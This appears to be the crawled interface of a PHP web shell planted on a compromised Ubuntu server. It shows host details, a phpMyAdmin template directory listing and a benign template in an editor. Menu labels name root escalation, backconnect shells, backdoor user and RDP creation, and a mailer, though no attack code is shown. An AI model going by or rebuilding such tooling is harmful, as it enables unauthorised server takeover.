Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
templates /
database /
designer /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregate_query_panel.phtml
3.26
KB
-rw-r--r--
canvas.phtml
97
B
-rw-r--r--
database_tables.phtml
9.11
KB
-rw-r--r--
delete_relation_panel.phtml
1.56
KB
-rw-r--r--
edit_delete_pages.phtml
546
B
-rw-r--r--
having_query_panel.phtml
5.91
KB
-rw-r--r--
js_fields.phtml
868
B
-rw-r--r--
new_relation_panel.phtml
4.38
KB
-rw-r--r--
options_panel.phtml
11.83
KB
-rw-r--r--
page_save_as.phtml
1.13
KB
-rw-r--r--
page_selector.phtml
415
B
-rw-r--r--
query_details.phtml
505
B
-rw-r--r--
rename_to_panel.phtml
2.35
KB
-rw-r--r--
schema_export.phtml
504
B
-rw-r--r--
side_menu.phtml
7.39
KB
-rw-r--r--
table_list.phtml
3.49
KB
-rw-r--r--
where_query_panel.phtml
4.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page_save_as.phtml
<?php $cfgRelation = PMA_getRelationsParam(); $choices = array( 'same' => __('Save to selected page'), 'new' => __('Create a page and save to it') ); ?> <form action="db_designer.php" method="post" name="save_as_pages" id="save_as_pages" class="ajax"> <?= PMA_URL_getHiddenInputs($db); ?> <fieldset id="page_save_as_options"> <table> <tbody> <tr> <td> <input type="hidden" name="operation" value="savePage" /> <?= PMA_getHtmlForPageSelector($cfgRelation, $db); ?> </td> </tr> <tr> <td> <?= PMA\libraries\Util::getRadioFields('save_page', $choices, 'same', true); ?> </td> </tr> <tr> <td> <label for="selected_value"><?= __('New page name'); ?></label> <input type="text" name="selected_value" id="selected_value" /> </td> </tr> </tbody> </table> </fieldset> </form>
Close